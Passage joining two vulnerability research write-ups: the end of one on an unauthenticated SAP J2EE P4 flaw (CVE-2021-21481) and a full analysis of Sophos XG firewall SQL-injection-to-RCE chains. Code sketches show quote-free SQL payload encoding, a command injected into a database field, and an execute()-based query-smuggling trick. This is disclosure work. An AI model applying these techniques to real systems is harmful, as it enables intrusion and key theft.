find, it is still highly critical and allows an attacker to compromise the
security of the underlying J2EE server.
The bug was filed as CVE-2021-21481. On March 9th, 2021, SAP provided a
fix. SAP note 3224022 describes the details.
P4 and JNDI
Listing 1 shows a small program that connects to a SAP J2EE server using P4:
The only hint that this code has something to do with a proprietary protocol
called P4 is the URL that starts with P4://. Other than that, everything is
encapsulated by standard JNDI calls (for those who want to refresh their memory
about JNDI).
Furthermore, it is not obvious that what is going on behind the scenes has
something to do with RMI. However, if you inspect more closely the types of the
involved Java objects, you'll find that keysMngr is of type
com.sun.proxy.$Proxy (implementing interface KeystoreManagerWrapper) and
keysMngr.getKeystore() is a plain vanilla RMI-call. The argument (the name
of the keystore to be instantiated) will be serialized and sent to the server
which will return a serialized keystore object (in this case it won't because
there is no keystore "whatever"). Also not obvious is that the instantiation
of the InitialContext requires various RMI calls in the background, for
example the instantiation of a RemoteLoginContext object that will allow to
process the login with the provided credentials.
Each of these RMI calls would in theory be a sink to send a
deserialization gadget to. In the exploit I mentioned above, one of the first
calls inside new InitialContext() was used to send the Jdk7u21 gadget
(instead of a java.lang.String object, by the way).
Now, since the Jdk7u21 gadget is not available anymore and I was looking for a
gadget consisting merely of SAP classes, I had to struggle with a very annoying
limitation: The classloader segmentation. SAP J2EE knows various types of
software components: interfaces, services, libraries and applications (which
can consist of web applications and EJBs). When you deploy a component, you
have to declare the dependencies to other components your component relies
upon. Usually, web applications depend on 2-3 services and libraries which will
have a couple of dependencies to other services and libraries, as well. At the
bottom of this dependency chain are the core components.
Now, the limitation I was talking about is the fact that the dependency
management greatly affects which classes a component can see: it can see
exactly the classes of the components it relies upon (plus, of course, the
JDK classes), but no more. If your class ships as part of the keystore service above, it
will only be able to resolve classes from components the keystore service
declares as dependencies.
Figure 1: dependencies of the keystore service with all child and parent classloaders
This has dramatic consequences for gadget development. Suppose you found a
gadget whose classes come from components X, Y and Z but there are no
dependencies between these components and in addition, there is no component
which depends on all of them. Then, no matter in which classloader context your
gadget will be deserialized, at least one of X, Y or Z will be missing in the
classpath and the deserialization will end up in a ClassNotFoundException.
By using an approach similar to the one described in the GadgetProbe
project, I found out that at the
point where the Jdk7u21 gadget was deserialized in the above-mentioned exploit,
there were only about 160 visible non-JDK classes that implement
java.io.Serializable. Not ideal for building an exploit.
Going back to listing 1, in case we send a gadget instead of the string
"whatever", we can tell from figure 1 that classes from ten components (the
ones listed beneath "Direct parent loaders") will be in the class path.
Code that sends an arbitrary serializable object instead of the string
"whatever" could, for example, look like this (instead of keysMngr.getKeystore()):
If there was a gadget, one could send it with out.writeObject().
With this approach, the critical mass of accessible serializable classes can be
significantly increased. The telnet interface of SAP J2EE provides useful
information about the services and their dependencies.
Regardless of the classloader challenge, I was eager to get an overview of how
many serializable classes existed in the server. The number of classes in the
core layer, services and libraries amounts to roughly 100,000, and this does
not even count application code. I quickly realized that I needed something
smarter than the analysis features of Eclipse to handle such volumes. So I
developed my own tool which analyses Java bytecode using the OW2 ASM
Framework. It writes object and interface inheritance
dependencies, methods, method calls and attributes to a SQLite DB. It turned
out that out of the 100,000 classes, about 16,000 implemented
java.io.Serializable. The RDBMS approach was pretty handy since it allowed
building complex queries like
Give me all classes which are Serializable and Cloneable, which implement private void readObject(java.io.ObjectInputStream), and whose toString() method exists and makes more than five calls to distinct other methods
This question translates to
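The original listing is not reproduced here, and the tool's real schema is not shown in the post; under a hypothetical schema (all table and column names below are assumptions), the question could translate into a query like this sketch:

```python
import sqlite3

# Hypothetical schema loosely modelled on the described tool; the real
# table and column names of the SQLite DB are assumptions.
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE class     (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE implements(class_id INTEGER, interface TEXT);
CREATE TABLE method    (class_id INTEGER, signature TEXT);
CREATE TABLE call      (class_id INTEGER, caller TEXT, callee TEXT);
""")

QUERY = """
SELECT c.name
FROM class c
JOIN implements s ON s.class_id = c.id AND s.interface = 'java.io.Serializable'
JOIN implements k ON k.class_id = c.id AND k.interface = 'java.lang.Cloneable'
JOIN method r ON r.class_id = c.id
             AND r.signature = 'private void readObject(java.io.ObjectInputStream)'
JOIN method t ON t.class_id = c.id AND t.signature LIKE '%toString()%'
JOIN call  x ON x.class_id = c.id AND x.caller = 'toString()'
GROUP BY c.id
HAVING COUNT(DISTINCT x.callee) > 5
"""

# Populate one matching candidate class to exercise the query.
db.execute("INSERT INTO class VALUES (1, 'com.example.Candidate')")
db.executemany("INSERT INTO implements VALUES (1, ?)",
               [('java.io.Serializable',), ('java.lang.Cloneable',)])
db.executemany("INSERT INTO method VALUES (1, ?)",
               [('private void readObject(java.io.ObjectInputStream)',),
                ('public java.lang.String toString()',)])
db.executemany("INSERT INTO call VALUES (1, 'toString()', ?)",
               [(f'm{i}',) for i in range(6)])

print([row[0] for row in db.execute(QUERY)])  # ['com.example.Candidate']
```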
The work on this tool and also the process of constantly inventing new and
original queries to find potentially interesting classes was great fun.
Unfortunately, it was also in vain. There is a library which almost allowed
building a wonderful chain from a toString() call to the ubiquitous
TemplatesImpl.getOutputProperties(), but the API provided by the library is
so complex and undocumented that, after two months, I gave up in total frustration.
There were some more small findings which don't really deserve to
be mentioned. However, I'd like to elaborate on one more thing before I'll
start part two of the blog post, that covers the real vulnerability.
One of the first interesting classes I discovered performs a JNDI lookup with
an attacker-controlled URL in private void readObject(java.io.ObjectInputStream). What would have been a direct hit four
years ago could at least have been a respectable success in 2020. Remember:
the Oracle JRE finally switched off remote classloading when resolving LDAP
references in version JRE 1.8.0_191. Had this been exploitable, it
would have opened up an attack avenue at least for systems with outdated JRE.
My SAP J2EE was running on top of a JRE version 1.8.0_51 from 2015, so the JNDI
injection should have worked, but, to my great surprise, it didn't.
The reason can be found in the method getObjectInstance of javax.naming.spi.DirectoryManager:
The highlighted call to getObjectFactoryFromReference is where an attacker needs to get to. The method resolves the JNDI reference using a URLClassLoader and an attacker-supplied codebase. However, as one can easily see, if getObjectFactoryBuilder() returns a non-null object, the code returns in either of the two branches of the following if clause, and the call to getObjectFactoryFromReference below is never reached.
And that is exactly what happens. SAP J2EE registers an ObjectFactoryBuilder of type com.sap.engine.system.naming.provider.ObjectFactoryBuilderImpl. This class will try to find a factory class based on the factoryName-attribute and completely ignore the codebase-attribute of the JNDI reference.
Bottom line is that JNDI injection might never have worked in SAP J2EE, which would eliminate one of the most important attack primitives in the context of Java Deserialization attacks.
CVE-2021-21481
After digressing about how I searched for deserialization gadgets, I'd like to
cover the real vulnerability now, which has absolutely nothing to do with Java
Deserialization. It is a plain vanilla instance of CWE-749: Exposed Dangerous
Method or Function. Let's go back to Listing 1. We can see that the JNDI
context allows to query interfaces by name, in our example we were querying the
KeyStoreManager interface by the name "keystore". On several occasions, I had
already tried to find an available rich client for SAP J2EE Engine
administration that uses P4. As I was unsuccessful every time, I came to
believe such a client did not officially exist, or at least was not at
everyone's disposal.
However, whenever you install a SAP J2EE Engine, the P4 port is enabled by
default and listening on the same network interface as the HTTP(s) services.
Because I was totally focused on deserialization, for a long time I
was oblivious to how much information one can glean through the JNDI context. E.g.
it is trivial to get all bindings:
The list() call allows simply iterating through all bindings:
Interesting items are proxy objects and the _Stub objects. E.g. the proxy for
messaging.system.MonitorBean can be cast to
com.sap.engine.messaging.app.MonitorHI.
During debugging of the server, I had already encountered the class
JUpgradeIF_Stub, long before I executed the call from Listing 5. The class
has a method openCfg(String path), and it was not difficult to establish that the
server-side implementation of the call didn't perform any authorization check. This one
definitively looked fishy to me, but since I wasn't looking for unprotected RMI
calls I put the finding into the box with the label "check on a rainy sunday
afternoon when the kids are busy with someone else".
But then, eventually, I did check it. It didn't take long to realize that I
had found a huge problem. Compare Listing 6.
The configuration settings of SAP J2EE Engine are organized in a hierarchical
structure. The location of an object can be specified by a path, pretty much
like a path of a file in the file system. The above code gets a reference to
the JUpgradeIF_Stub by querying the JNDI context with name
"MigrationService", gets an instance of a Configuration object by a call to
openCfg() and then walks down the path to the leaf node. The element found there
can be exported to an archive that is stored in the file system of the server
(call to export(String path)). If carefully chosen, the local path on the
server will point to a root folder of a web application. There, download.zip
can simply be downloaded through HTTP. If you want to check for yourself, the
UME configuration is stored at
cluster_config/system/custom_global/cfg/services/com.sap.security.core.ume.service/properties.
You'd probably say: "Hey! I need to be Administrator to do that! Where's the
harm?" Right, I thought so, too. But you neither need to be Administrator,
nor do you even have to be authenticated. The following code works perfectly
fine:
So does the enumeration using ctxt.list() from Listing 5. The fact that authentication is
not needed at this point is not new at all by the way, compare CVE-2017-5372.
However, you will get a permission exception when calling
keysMngr.getKeystore() (because getKeystore() does have a permission
check). But JUpgradeIF.openCfg() was missing the check until SAP fixed it.
At this point, even without SAP-specific knowledge, an attacker can cause
significant harm, e.g. by flooding the server's file system with archives,
causing a resource exhaustion DoS condition.
With a little insider knowledge one can get admin access. In the configuration
tree, there is a keystore called TicketKeystore. Its cryptographic key pair
is used to sign SAP Logon Tickets. If you steal the keystore, you can issue a
ticket for the Administrator user and log on with full admin rights. There
are also various other keystores, e.g. for XML signatures and the like (let
alone the fact that there are tons of things in this store; probably no one
knows all the security-sensitive things you can get access to ...)
This information should be sufficient for an understanding of CVE-2021-21481.
The exact location of the keystores in the configuration and the relative local
path in order to download the archive by HTTP are left as an exercise to the
reader.
On April 25, 2020, Sophos published a knowledge base
article (KBA) 135412 which warned about a
pre-authenticated SQL injection (SQLi) vulnerability, affecting the XG Firewall
product line. According to Sophos this issue had been actively exploited at
least since April 22, 2020. Shortly after the knowledge base article, a detailed analysis of the so-called Asnarök operation
was published. Whilst the KBA focused solely on the SQLi, this write-up clearly indicated
that the attackers had somehow extended this initial vector to achieve remote code execution (RCE).
The criticality of the vulnerability prompted us to immediately warn our clients of the issue.
As usual we provided lists of exposed and affected systems.
Of course we also started an investigation into the technical details of the vulnerability.
Due to the nature of the affected devices and the prospect of RCE, this vulnerability sounded like a perfect candidate for a perimeter breach in upcoming red team assessments.
However, as we will explain later, this vulnerability will most likely not be as useful for this task as we first assumed.
Our analysis not only resulted in a working RCE
exploit for the disclosed vulnerability (CVE-2020-12271) but also led to the discovery of
another SQLi, which could have been used to gain code execution (CVE-2020-15504). The
criticality of this new vulnerability is similar to the one used in the
Asnarök campaign: exploitable pre-authentication either via an exposed
user or admin portal. Sophos quickly reacted to our bug report, issued
hotfixes for the supported firmware versions and released new firmware
versions for v17.5 and v18.0 (see also the Sophos Community Advisory).
I am Groot
The lab environment setup will not be covered
in full detail since it is pretty straightforward to deploy a virtual XG
firewall. Appropriate firmware ISOs can be obtained from the official download
portal. What is notable is the fact that the firmware allows administrators direct root shell access via the serial interface, the
TelnetConsole.jsp in the web interface or the SSH server. Thus there was
no need to escape from any restricted shells or to evade other
protection measures in order to start the analysis.
Device
Management -> Advanced Shell -> /bin/sh as root.
After getting familiar with the filesystem layout,
exposed ports and running processes, we suddenly noticed a message in the XG
control center informing us that a hotfix for the n-day vulnerability we were
investigating had automatically been applied.
Control Center after the
automatic installation of the hotfix (source).
We leveraged this behavior to create a file-system
snapshot before and after the hotfix. Unfortunately diffing the web root
folders in both snapshots (aiming for a quick win) resulted in only one changed
file with no direct indication of a fixed SQL operation.
Architecture
In order to understand the hotfix, it was
necessary to delve deep into the underlying software architecture. As the
published information indicated that the issue could be triggered via the web
interface we were especially interested in how incoming HTTP requests
were processed by the appliance.
Both web interfaces (user and admin) are based
on the same Java code served by a Jetty server behind an Apache server.
Jetty
server on port 8009 serving /usr/share/webconsole.
Most interface interactions (like a login
attempt) resulted in an HTTP POST request to the endpoint
/webconsole/Controller. Such a request contained at least two
parameters: mode and json. The former specified a number which was
mapped internally to a function that should be invoked. The latter specified the
arguments for this function call.
Login
request sent to /webconsole/Controller via XHR.
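A request of this shape is easy to reproduce; the endpoint and the two-parameter layout are as described above, while the mode number and the credential values below are placeholders:

```python
import json
from urllib.parse import urlencode

# The mode number and credentials are placeholders; only the mode/json
# parameter pair of a POST to /webconsole/Controller is of interest here.
def build_controller_body(mode: int, arguments: dict) -> str:
    return urlencode({"mode": mode, "json": json.dumps(arguments)})

body = build_controller_body(151, {"username": "admin", "password": "secret"})
print(body)
```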
The corresponding servlet checked whether the
requested function required authentication, performed some basic parameter
validation (the code depended on the called function) and transmitted a message
to another component: the CSC.
This message followed a custom format and was
sent via either UDP or TCP to port 299 on the local machine (the firewall). The
message contained a JSON object which was similar but not identical to the
json parameter provided in the initial HTTP request.
JSON
object sent to CSC on port 299.
The CSC component (/usr/bin/csc) appeared to be
written in C and consisted of multiple submodules (similar to a busybox
binary). To our understanding this binary is a service manager for the firewall
as it contained, started and controlled several other jobs. We encountered a
similar architecture during our Fortinet research.
Multiple
different processes spawned by the CSC binary.
CSC parsed the incoming JSON object and called
the requested function with the provided parameters. These functions, however,
were implemented in Perl and were invoked via the Perl C language interface.
In order to do so, the binary loaded and decrypted an XOR encrypted file
(cscconf.bin) which contained various config files and Perl packages.
Another essential part of the architecture were
the different PostgreSQL database instances which were used by the web interface,
the CSC and the Perl logic, simultaneously.
The
three PostgreSQL databases utilized by the appliance.
High
level overview of the architecture.
Locating the Perl logic
As mentioned earlier, the Java component
forwarded a modified version of the JSON parameter (found in the HTTP
request) to the CSC binary. Therefore we started by having a closer look at
this file. A disassembler helped us to detect the different sub modules which
were distributed across several internal functions, but did not reveal any logic
related to the login request. We did however find plenty of imports related to
the Perl C language interface. This led us to the assumption that the relevant
logic was stored in external Perl files, even though an intensive search on the
filesystem had not returned anything useful. It turned out that the missing Perl
code and various configuration files were stored in the encrypted tar.gz
file (/_conf/cscconf.bin) which was decrypted and extracted during the
initialization of CSC. The reason why we previously could not locate the decrypted files
was that they could only be found in a separate Linux namespace.
As can be seen in the screenshot below, the
binary created a mount point and called the unshare
syscall with the flag parameter set to 0x20000. This constant translates
to the CLONE_NEWNS flag, which disassociates the process from the
initial mount namespace.
For those unfamiliar with Linux namespaces: in
general, each process is associated with a namespace and can only see, and thus
use, the resources associated with that namespace. By detaching itself from the
initial namespace, the binary ensures that all mounts created after the
unshare syscall are not propagated to other processes. Namespaces
are a feature of the Linux kernel, and container solutions like Docker heavily rely on them.
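The same syscall can be sketched from Python via ctypes. This is an illustration only: it needs root (or CAP_SYS_ADMIN) to succeed, and the constant matches the 0x20000 flag seen in the disassembly.

```python
import ctypes
import os

CLONE_NEWNS = 0x00020000  # new mount namespace, the 0x20000 from the binary

def detach_mount_namespace() -> bool:
    """Try to detach from the initial mount namespace, like the csc binary does."""
    libc = ctypes.CDLL(None, use_errno=True)
    if not hasattr(libc, "unshare"):  # non-Linux platform
        print("unshare not available")
        return False
    if libc.unshare(CLONE_NEWNS) != 0:
        # Typically EPERM without root / CAP_SYS_ADMIN.
        print("unshare failed:", os.strerror(ctypes.get_errno()))
        return False
    # Mounts created from now on are invisible to the initial namespace.
    return True

if __name__ == "__main__":
    detach_mount_namespace()
```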
Calling
unshare, to detach from the initial namespace, before extracting the
config.
Therefore, even within a root shell, we were not
able to access the extracted archive. Whilst multiple approaches exist to
overcome this, the most appealing at that point was to simply patch the
binary. This way, it was possible to copy the extracted config to a
world-writable path. In hindsight, it would probably have been easier to just scp
nsenter to the appliance.
Accessing the decrypted and extracted files by jumping into the
namespace of the CSC binary.
From a handful of information to the N-Day
(CVE-2020-12271)
The rolled-out hotfix boiled down to the
modification of one existing function (_send) and the introduction of
two new functions (getPreAuthOperationList and
addEventAndEntityInPayload) in the file
/usr/share/webconsole/WEB-INF/classes/cyberoam/corporate/CSCClient.class.
The function getPreAuthOperationList
defines all modes which can be called unauthenticated. The function
addEventAndEntityInPayload checks whether the mode specified in the request
is contained in the preAuthOperationsList and removes the Entity
and Event keys from the JSON object if that is the case.
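Translated into Python for illustration (the mode numbers below are placeholders; the real set comes from getPreAuthOperationList), the hotfix logic amounts to roughly this:

```python
# Sketch of the described hotfix behaviour: for unauthenticated modes, the
# Entity and Event keys are stripped from the JSON object before it is
# forwarded to CSC. The mode numbers here are placeholders.
PRE_AUTH_MODES = {151, 152}  # placeholder values

def add_event_and_entity_in_payload(mode: int, payload: dict) -> dict:
    if mode in PRE_AUTH_MODES:
        payload.pop("Entity", None)
        payload.pop("Event", None)
    return payload

print(add_event_and_entity_in_payload(151, {"Entity": "x", "user": "a"}))
# {'user': 'a'}
```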
Analysis
Based on the hotfix we assumed that the
vulnerability must reside within one of the functions specified in the
getPreAuthOperationList. However, after browsing through the relevant
Perl code in order to find blocks that made use of the Entity or
Event key, we were pretty confident that this was not the case.
What we did notice, though, is that regardless of
which mode we specified, every request was processed by the apiInterface
function. Sophos internally denoted the functions mapped to the mode parameter
as opcodes.
The apiInterface function was also the
place where we finally found the SQLi vulnerability, a.k.a. the execution of
arbitrary SQL statements. As depicted in the source excerpt below, this
opcode called the executeDeleteQuery function (line 27), which took a SQL
statement from the query parameter and ran it against the database.
Unfortunately, in order to reach the vulnerable
code, our payload needed to pass every preceding CALL statement which
enforced various conditions and properties on our JSON object.
The first call (validateRequestType)
required that Entity was not set to securitypolicy and that the
request type was ORM after the call.
The preceding call
(variableInitialization) initialized the Perl environment and should
always succeed. In order to keep our request simple and not to introduce
additional requirements, the Entity value in our payload should not be one of
the following: securityprofile, mtadataprotectionpolicy,
dataprotectionpolicy, firewallgroup, securitypolicy, formtemplate or
authprofile. This allowed us to skip the checks performed in the function
opcodePreProcess.
The checkUserPermission function does
what its name suggests. However, the function body that can be seen below is
only executed if the JSON object passed to Perl included a __username
parameter. This parameter was added by the Java component before the request was
forwarded to the CSC binary, if the HTTP request was associated with a valid
user session. Since we used an unauthenticated mode in our payload, the
__username parameter was not set and we could ignore the respective
code.
To skip over the preMigration call we
just had to choose a mode not equal to 35 (cancel_firmware_upload),
36 (multicast_sroutes_disable) or 1101 (unknown). On top of that, all
three modes required authentication, making them unusable for our purposes
anyway.
Depending on the request type, the function
createModeJSON employed a different logic to load the Perl module
connected to the specified entity. Since each POST request initially started
as an ORM request, we needed to be careful that the request type was not
changed to something else. This was required to satisfy the last if statement
before the vulnerable function was called inside the apiInterface
function. Therefore, the condition on line 15 must not be satisfied. The
respective code checked if the request type specified in the loaded Perl module
equaled ORM. We leave the identification of such an Entity as an exercise
to the interested reader.
We skipped the call to the
migrateToCurrVersion function since it was not important for our chain.
The next call to createJson verified if the previously loaded Perl
package could actually be initialized and would always work as long as it referred to an
existing Entity.
The function handleDeleteRequest once
again verified that the request type was ORM. After removing duplicate
keys from our JSON, it ensured that our JSON payload contained a name
key. The code then looped through all values which were specified in our
name property and searched for foreign references in other database
tables in order to delete these. Since we did not want to delete any existing
data we simply set the name to a non-existing value.
We skipped the last two function calls to
replyIfErrorAtValidation and getOldObject because they were not
relevant to our chain and we had already walked through enough Perl code.
What did we learn so far?
- We need a mode which can be called from an unauthenticated perspective.
- We should not use certain Entities.
- Our request needed to be of type $REQUEST_TYPE{ORMREQUEST}.
- The request had to contain a name property which held some garbage value.
- The EventProperties of the loaded Entity, and in particular the DELETE property, had to set the ORM value to true.
- Our JSON object had to contain a query key which held the actual SQL statement we wanted to execute.
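Put together, a request satisfying these conditions can be sketched as follows. This is an illustration only: the mode number and Entity name below are placeholders, not working values, since identifying a suitable unauthenticated mode/Entity pair is left as the exercise mentioned above.

```python
import json

def build_csc_request(mode, entity, sql):
    # Placeholder mode/Entity: a real request needs an unauthenticated
    # mode and an Entity whose DELETE EventProperties set ORM to true.
    return json.dumps({
        "mode": mode,
        "Entity": entity,
        "name": "nonexistent-object",  # garbage value, matches nothing
        "query": sql,                  # the SQL statement to execute
    })

payload = build_csc_request(9999, "someentity", "SELECT pg_sleep(6)")
```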
When we satisfied all of the above conditions we
were able to execute arbitrary SQL statements. There was only one caveat: we could
not use any quotes in our SQL statements since the csc binary properly
escaped those (see the escapeRequest sub in the 0-day chapter for details). As a workaround we defined
strings with the help of the concat and chr SQL functions.
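The quote-free string construction can be automated; a small helper along these lines (an illustration, not the original tooling) emits a concat/chr expression for any literal:

```python
def sql_str(s):
    """Build a quote-free Postgres string expression from concat()/chr(),
    e.g. 'hi' -> concat(chr(104),chr(105))."""
    return "concat(" + ",".join("chr(%d)" % ord(c) for c in s) + ")"

print(sql_str("hi"))
```

Any literal produced this way survives the quote escaping, since the expression itself contains no quote characters.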
From SQLi to RCE
Once we had gained the ability to modify the
database to our needs, there were quite a few places where the SQLi could be
expanded into an RCE. This was the case because parameters contained within the database were passed
to exec calls without sanitation in multiple instances. Here we will only
focus on the attack path which was, based on our understanding and the details
released in Sophos' analysis, used during the Asnarök campaign.
According to the published information, the
attackers injected their payloads into the hostname field of the Sophos
Firewall Manager (SFM) to achieve code execution. SFM is a separate
appliance to centrally manage multiple appliances. This raised the question:
what happens in the back end if you enable the central administration?
To locate the database values related to the
SFM functionality we dumped the database, enabled SFM in the front end,
and created another dump. A diff of the dumps was then used to identify the
changed values. This approach revealed the modification of multiple database
rows. The attribute CCCAdminIP in the table
tblclientservices was the one used by the attackers to inject their
payload. A simple grep for CCCAdminIP directed us to the function
get_SOA in the Perl code.
As can be seen on line 15, the code retrieves the
value of the CCCAdminIP from the database and passes it
unfiltered into the EXECSH call on line 22. Due to some kind of cronjob
the get_SOA opcode is executed regularly leading to the automatic
execution of our payload.
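An injected statement abusing this sink might look roughly like the following sketch. The shell command and the exact UPDATE shape are illustrative assumptions; only the table and column names are taken from the analysis above, and the chr()/concat() encoding keeps the statement quote-free.

```python
def sql_str(s):
    # quote-free Postgres string literal via concat()/chr()
    return "concat(" + ",".join("chr(%d)" % ord(c) for c in s) + ")"

# Illustrative command only; the real campaign planted its payload in
# CCCAdminIP, which get_SOA later hands to EXECSH via the cronjob.
cmd = "touch /tmp/poc"
stmt = "UPDATE tblclientservices SET CCCAdminIP=" + sql_str(cmd)
```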
What made this particular attack chain very
unfortunate was the if condition on line 11: the EXECSH call could only be
reached if the automatic installation of hotfixes was active (the default
setting) and if the appliance was configured to use SFM for central management
(not the default setting). This resulted in a situation in which the attackers most likely
only gained code execution on devices with activated auto-updates, leading to
a race between the hotfix installation and the moment of exploitation.
Installations that do not have automatic hotfixes enabled or have not moved to the latest supported maintenance releases could still be vulnerable.
Gaining code execution via the SQLi described in CVE-2020-12271.
From N to Zero (CVE-2020-15504)
Another promising approach for discovery of the
n-day, instead of starting at a patch diff, seemed to be an analysis of all
back end functions (callable via the /webconsole/Controller
endpoint) which did not require authentication. The respective function numbers
could, for example, be extracted from the Java function
getPreAuthOperationList.
SQL-Injection countermeasures inside the Perl
logic
Despite the fact that the back end performed
all its SQL operations without prepared statements, those were not automatically
susceptible to injection.
The reason for this was that all function
parameters coming in via port 299 were automatically escaped via the
escapeRequest function before being processed.
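Conceptually, the global escaping can be modeled like the sketch below; the exact character set handled by the real escapeRequest sub is an assumption based on the behavior observed in this post.

```python
def escape_request(value):
    # Model of the CSC's global escaping: backslash-escape quote
    # characters in every incoming parameter before opcode dispatch.
    for ch in ("\\", "'", '"'):
        value = value.replace(ch, "\\" + ch)
    return value

print(escape_request("name='x'"))  # name=\'x\'
```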
So everything is safe?
One function which caught our attention was
RELEASEQUARANTINEMAILFROMMAIL (NR 2531) as the corresponding logic
silently bypassed the automatic escaping. This happened because the function
treated one of the user-controllable parameters as a Base64 string and used this
parameter, decoded, inside a SQL statement. As the global escaping took place
before the function was actually called, it only ever saw the encoded string and
thus missed any included special characters such as single quotes.
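The bypass is easy to demonstrate in isolation; the escaping is again modeled as simple quote-escaping and the injection value is purely illustrative:

```python
import base64

def escape_request(value):
    # stand-in for the global quote escaping
    return value.replace("'", "\\'")

inner = "hdnFilePath=' OR pg_sleep(1)--"  # illustrative injection value
encoded = base64.b64encode(inner.encode()).decode()

# The escaping only ever sees the Base64 alphabet: nothing to escape.
assert escape_request(encoded) == encoded
# After the opcode decodes the parameter, the quote is back, unescaped.
assert "'" in base64.b64decode(encoded).decode()
```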
After the parameter was decoded, it was split into
different variables. This was done by parsing the string based on the
key=value syntax used in HTTP requests. We were concentrating on the
hdnFilePath variable, as its value did not need to satisfy any
complicated conditions and ended up in the SQL statement later on.
The only constraint for
$requestData{hdnFilePath} was, that it did not contain the sequence
../ (which was irrelevant for our purposes anyway). After crafting a release
parameter in the appropriate format we were now able to trigger a SQLi in
the above SELECT statement. We had to be careful to not
break the syntax by taking into account that the manipulated parameter was
inserted six times into the query.
Triggering a database sleep through the discovered SQLi (6s delay, as the sleep command was injected six times).
Upgrading the boring Select statement
The ability to trigger a sleep enables an
attacker to use well known blind SQLi techniques to read out arbitrary database
values. The underlying Postgres instance (iviewdb) differed from
the one targeted in the n-day. As this database did not seem to store any
values useful for further attacks, another approach was chosen.
With the code-execution technique used
by Asnarök in mind, we aimed for the execution of an INSERT operation alongside a SELECT.
In theory, this should be easily achievable by using stacked queries.
After some experimentation, we were able to confirm that stacked queries were
supported by the deployed Postgres version and the used database API. Yet, it
was impossible to get it to work through the SQLi. After some frustration,
we found out that the function iviewdb_query (/lib/libcscaid.so)
called the escape_string (/usr/bin/csc) function before submitting the
query. As this function escaped all semicolons in the SQL statement, the use of
stacked queries was made impossible.
Giving up yet?
At this point, we were able to
trigger an unauthenticated SQL Injection in a SELECT statement in the
iviewdb database, which did not provide us with any meaningful starting points for an escalation to RCE.
Not wanting to abandon the goal of achieving code execution we brainstormed for other approaches.
Eventually we came up with the following idea - what if we modified our payload in such a
way that the SQL statement returned values in the expected form? Could this
allow us to trigger the subsequent Perl logic and eventually reach a point where
a code execution took place? Constructing a payload which enabled us to return arbitrary
values in the queried columns took some attempts but succeeded in the end.
Execution of a SELECT statement which returns values specified inside
the payload.
After we had managed to construct such a payload we
concentrated on the subsequent Perl logic. Looking at the source we found a
promising EXEC call just after the database query. And one of the
parameters for that call was derived from a variable under user control.
Unfortunately, the variable $g_ha_mode
(most likely related to the high availability feature) was set to false
in the default configuration. This prompted us to look for a better way.
The function mergequarantine_manage did not contain any further
exec calls but triggered two other Perl functions in the same file, under the
right conditions. Those functions were triggered via the
apiInterface opcode which generated a new CSC request on port 299.
In our case $request->{action} was
always set to release, restricting us to a call to
manage_quarantine. This function used its submitted parameters
(the result-set from the query in mergequarantine_manage) to trigger another
SELECT statement. When this statement returned matching values, an EXEC
call was triggered, which got one of the returned values as a parameter.
The question now was how the result-set of
the second SELECT statement could be manipulated through the result-set of
the first statement.
How about returning values in the first query which would trigger
a SQLi in the second statement? Because string concatenation was used to construct the statement, this should have been possible in theory.
Unfortunately, even after having invested quite a bit of work into crafting such a payload, we were unable to obtain the desired results.
A brief analysis of how our payload was processed revealed that it was somehow escaped before reaching the
second query.
As it turned out, the reason for this was actually pretty obvious: since the function
was triggered via a new CSC request, it automatically passed through the
previously described escape logic.
Time to accept our defeat and be happy with
the boring SQLi? Not quite...
Desperately looking for other ways to weaponize
the injection we dug deeper into the involved components. At an earlier stage
we had already created a full dump of the iviewdb database but did not pay
too much attention to it after realizing that it did not include any useful
information. On revisiting the database, one of its features stood out:
so-called user-defined functions, which were heavily used by the appliance.
User-defined functions enable the extension of the
predefined database operations by defining your own SQL functions. Those can be
written in Postgres' own language: PL/pgSQL. What made such functions
interesting for our attack was that previously defined functions could be called
inline in SELECT statements. The call syntax is the same as for any other SQL
function, i.e. SELECT my_function(param1, param2) FROM table;.
The idea at this point was that one of the
existing user-defined functions might allow the execution of stacked queries.
This would be the case as soon as a parameter was used for a SQL statement without
proper filtering inside a function. Walking over the database dump revealed
multiple code blocks matching this characteristic and, to our surprise, an even
simpler way to execute arbitrary statements: the function execute.
The respective code expected only one parameter, which was directly executed as
a SQL statement without any further checks.
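With execute available, an arbitrary statement can be smuggled into the injectable SELECT by encoding it quote-free and passing it inline. The sketch below is illustrative: the row values are placeholders, while the table and column names are those used by the real chain.

```python
def chr_expr(sql):
    # quote-free Postgres string expression for an arbitrary statement
    return "||".join("chr(%d)" % ord(c) for c in sql)

# Illustrative INSERT to be run through the user-defined execute() function
inner = ("INSERT INTO tblquarantinespammailmerge(quarantinearea,messageid)"
         " VALUES (chr(97),chr(97))")
injected = "execute(" + chr_expr(inner) + ")"
```

Because the whole statement travels as a chr()-encoded argument to execute, neither the escaped quotes nor the escaped semicolons stand in the way anymore.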
This function would, in theory, allow us to
execute an INSERT statement inside the SELECT query of
mergequarantine_manage. This could be then used to add database rows to
the table tblquarantinespammailmerge which should later end up in the
exec call in manage_quarantine.
Triggering an INSERT statement
via the execute function from within a SELECT statement.
After fiddling around for quite some time we
were finally able to construct an appropriate payload (see below).
Explanation:
- Line 1-2: Defining the two HTTP parameters needed for mode 2531.
- Line 3-6: Defining the three Base64-encoded parameters that are needed to pass the initial checks in mergequarantine_manage.
- Line 7: Triggering the SQLi by injecting a single quote.
- Line 8-11: Utilizing the user-defined function execute in order to trigger different SQL operations than the predefined SELECT.
- Line 10: Adding a new row to the table tblquarantinespammailmerge that contains our code-execution payload in the field quarantinearea and sets messageid to 'a'. Note the .eml portion inside the payload, which is required to reach the exec call.
- Line 9: Deleting all rows from tblquarantinespammailmerge where the messageid equals 'a'. This ensures that the mentioned table contains our payload only once (remember that the vector is injected 6x in the initial statement). While this is not strictly necessary, it simplifies the path taken after the SELECT statement in manage_quarantine and prevents our payload from being executed multiple times.
- Line 12-14: Needed to comply with the syntax of the predefined statement.
Using the above payload resulted in the
execution of the following Perl command:
So finally our job was done... but somehow there seemed to be no time delay that
would indicate that our sleep had actually triggered. But why? Did we not use
exactly the same execution mechanism as in the n-day? Turns out: not quite.
Asnarök used EXECSH, whereas we were dealing with EXEC. Unfortunately, EXEC
treats spaces in arguments correctly by passing them as individual values to
the script.
I assume we better bury our heads in the
sand
We had come too far to give up now, so we carried on.
Finally we were able to execute code through the SQLi and it was good ol' Perl which allowed us to do so.
Adding this last piece to the attack chain and
fixing a minor issue in the posted payload is left up to the reader.
Triggering a reverse shell by abusing the discovered vulnerability.
Timeline
